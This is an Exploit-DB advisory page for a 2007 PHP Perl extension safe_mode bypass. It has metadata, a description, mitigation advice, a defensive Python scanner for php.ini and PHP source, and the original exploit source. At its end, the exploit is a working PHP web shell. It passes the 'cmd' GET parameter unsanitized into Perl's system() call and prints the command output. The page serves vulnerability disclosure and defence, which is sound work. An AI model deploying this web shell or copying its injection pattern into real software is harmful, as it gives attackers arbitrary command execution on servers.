Vendor: PHP
By: NetJackal
CVSS: 7.5 (HIGH)
Safe_mode Bypass
CWE: 78
Product Name: PHP
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PHP Perl Extension Safe_mode Bypass Exploit

This exploit bypasses safe mode restrictions in PHP by leveraging the PHP Perl extension: the command runs inside the embedded Perl interpreter rather than through PHP's own functions. An attacker can execute arbitrary commands on the target system by supplying a command in the 'cmd' parameter of a GET request. The script first checks that the Perl extension is loaded; if the 'cmd' parameter is empty, it sets a default command based on the operating system. The Perl extension is then used to execute the command, and the output is displayed in a textarea element on the page. The 'cmd' value is passed through htmlspecialchars() only when it is echoed back into the form, after the command has run, to prevent HTML injection; it is not sanitized before execution.

Mitigation:

To mitigate this vulnerability, the PHP Perl extension should be disabled or removed if not required. Additionally, input validation and sanitization should be implemented to prevent command injection attacks.
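
A defensive audit for the mitigation above, as an added example that is not part of the original advisory or exploit: it reports active php.ini lines that load the Perl extension and PHP source lines that pass request input to the Perl interpreter's eval. The module file names perl.so and php_perl.dll, the function names, and the sample inputs are assumptions constructed for illustration.

```python
import re

# Assumption: the PECL perl extension ships as perl.so (Unix) or php_perl.dll (Windows).
INI_PERL = re.compile(
    r'^\s*extension\s*=\s*"?(?:.*[\\/])?(?:php_)?perl(?:\.so|\.dll)?"?\s*(?:;.*)?$',
    re.IGNORECASE)
NEW_PERL = re.compile(r'\bnew\s+perl\b', re.IGNORECASE)
PERL_EVAL = re.compile(r'->\s*eval\s*\(([^;]*)', re.IGNORECASE)
REQUEST_VAR = re.compile(
    r'\$(?:_GET|_POST|_REQUEST|_COOKIE|HTTP_GET_VARS|HTTP_POST_VARS)\b')

def perl_extension_lines(ini_text):
    """Return 1-based line numbers of active (uncommented) perl extension loads."""
    return [n for n, line in enumerate(ini_text.splitlines(), 1)
            if INI_PERL.match(line)]

def scan_php_source(php_text):
    """Return (line, finding) tuples for Perl-interpreter use in PHP source."""
    if not NEW_PERL.search(php_text):
        return []  # file never instantiates the Perl class
    findings = []
    for n, line in enumerate(php_text.splitlines(), 1):
        if NEW_PERL.search(line):
            findings.append((n, "perl-interpreter-instantiated"))
        m = PERL_EVAL.search(line)
        if m and REQUEST_VAR.search(m.group(1)):
            findings.append((n, "request-input-in-perl-eval"))
    return findings

# Constructed sample inputs (not taken from a real host).
SAMPLE_INI = """\
; extension=perl.so
extension=pdo_mysql.so
extension = "/usr/lib/php/modules/perl.so"
"""
SAMPLE_PHP = """\
<?php
$perl = new perl();
$perl->eval("system('" . $_GET['cmd'] . "')");
$perl->eval('print "static\\n"');
"""

if __name__ == "__main__":
    print("php.ini lines loading perl:", perl_extension_lines(SAMPLE_INI))
    for lineno, finding in scan_php_source(SAMPLE_PHP):
        print(f"line {lineno}: {finding}")
```

The source scan is a line-based heuristic: it does not follow request input that is first copied into another variable, so any file reporting perl-interpreter-instantiated still needs manual review.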

Exploit-DB raw data:

<?php

##########################################################
###----------------------------------------------------###
###----PHP Perl Extension Safe_mode Bypass Exploit-----###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################

if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "</textarea>";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>"

?>

# milw0rm.com [2007-08-25]